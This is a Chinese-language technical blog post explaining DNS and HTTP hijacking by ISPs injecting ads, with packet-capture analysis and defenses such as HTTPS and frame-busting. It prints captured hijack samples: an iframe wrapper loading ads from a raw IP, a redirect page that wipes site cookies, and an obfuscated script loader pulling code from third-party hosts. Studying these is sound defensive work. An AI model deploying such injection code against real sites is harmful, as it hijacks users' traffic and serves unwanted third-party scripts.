劫持的类型:

DNS劫持

HTTP劫持


DNS劫持:顾名思义就是直接修改网站IP,现在比较少见,易发现也容易出问题

HTTP劫持:

    iframe类型

    js插入


iframe劫持比较常见也不容易出现问题

wKioL1gyh56QH-ZFAAMrjtagrms813.png

上面这则广告就是劫持的效果

iframe劫持

<!DOCTYPE html>
    <html>
        <head>
            <meta charset="UTF-8">
            <meta name="apple-mobile-web-app-capable" content="yes">
            <meta content="telephone=no" name="format-detection">
            <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
            <meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,maximum-scale=1,minimum-scale=1">
            <title></title>
            <script type="text/javascript" src="
            <style type="text/css">
                html,body{padding:0;margin:0;}
            </style>
        </head>
 <body>
     <iframe id="content" src="http://你要访问的网址" width="100%" frameborder="no">
     </iframe>
 </body>
 <script type="text/javascript">
     var _appid="900013";
 </script>
 <script type="text/javascript" src="http://112.74.134.239/js/ads.min.20160921.js"></script></html>

另外一种劫持直接就是跳转

C:\Users\Administrator>curl http://www.114la.com
<html>
    <head>
    <meta http-equiv="refresh" content="0;url=http://www.xxxxx.com/?34565(要跳转的网站)
    <meta name="referrer" content="never">
    <script>
        function clearCookie(){
            var keys=document.cookie.match(/[^ =;]+(?=\=)/g);
            if (keys) {
                for (var i = keys.length; i--;){
                    document.cookie=keys[i]+'=0;domain=.114la.com;path=/;expires='+new Date( 0).toUTCString();
                    }
            }
        } 
        clearCookie();
   </script>
   </head>
   <body>
   </body>
</html>


JS劫持就是替换你的JS文件,然后重新请求一个JS文件。比如你请求的是

http://www.xxxx.com/sdsd.js

则会被替换为

http://www.xxxx.com/sdsd.js (插入广告代码)

http://www.xxxx.com/sdsd.js?20161121 (正常的js代码)


插入广告代码的js内容则为

(function() {
    try {
        var o = 'm-_-m',
        D = document;
        if (!D.getElementById(o)) {
            var j = 'http://www.jxrcw.com/gposinfo/js2014/sys_frame.js',
            J = j + (~j.indexOf('?') ? '&': '?') + new Date().getTime(),
            M = 'http://www.170yy.com/v2/v.php?id=01',
            C = D.currentScript,
            H = D.getElementsByTagName('head')[0],
            N = function(s, i) {
                var I = D.createElement('script');
                I.type = 'text/javascript';
                if (i) I.id = i;
                I.src = s;
                H.appendChild(I);
            };
            if (self == top) {
                N(M, o);
            }
            if (!C) {
                C = (function() {
                    var S = D.scripts,
                    l = S.length,
                    i = 0;
                    for (; i < l; ++i) {
                        if (S[i].src === j) {
                            return S[i];
                        }
                    }
                })();
            }
            C && ((C.defer || C.async) ? N(J) : D.write('<script src="' + J + '"><' + '/script>'));
        }
    } catch(e) {}
})();

wKiom1gyjUaSYKTYAAdapLGckQU772.png


劫持网络层分析:

wKiom1gykAriuHZeAAEw7UK188M309.png

从上面可以看到针对HTTP请求,出现一次重传。来看下两次传回的内容

第一次劫持返回的数据

wKiom1gykO6y1h2PAAISGMkPHoY570.png

第二次正常服务器传回的数据

wKiom1gykQ6Q_a5CAAHjJfYYrRk525.png


两次回传的数据截然不同,正是因为劫持流量先于正常流量,因此正常流量失效,因此一个流量劫持就成功了,详细的抓包可下载本文附件



HTTP防劫持方法:

终极方法:全站HTTPS

优点:一劳永逸

缺点:成本高,对网站性能有影响,可能需要修改权限

证书费用:可以采用免费的let's encrypt,以及WoSign,StartSSL,以及腾讯云的1年免费SSL(基于亚洲诚信)


绕过劫持

优点:成本小,需改动部分代码

缺点:效果不明显,而且必须要在每个页面都加以修改


1.应对JS劫持:

    根据劫持的策略,比如上面的针对http://www.xxxx.com/sdsd.js?20161121不在劫持,则在HTTP里面就自动加上?20161121这样的尾巴


2.应对iframe劫持:

    在网页的头部加上

    <script type="text/javascript">	
        try
        {
            if (self != top) {  
                //alert("广告跳转");
                top.location=self.location;
            }
        }
        catch (e) {
        }
    </script>

检查到网页在iframe中则自动重新加载一次


参考: 1.http://www.cnblogs.com/kenkofox/p/4924088.html

    2.http://www.cnblogs.com/kenkofox/p/4919668.html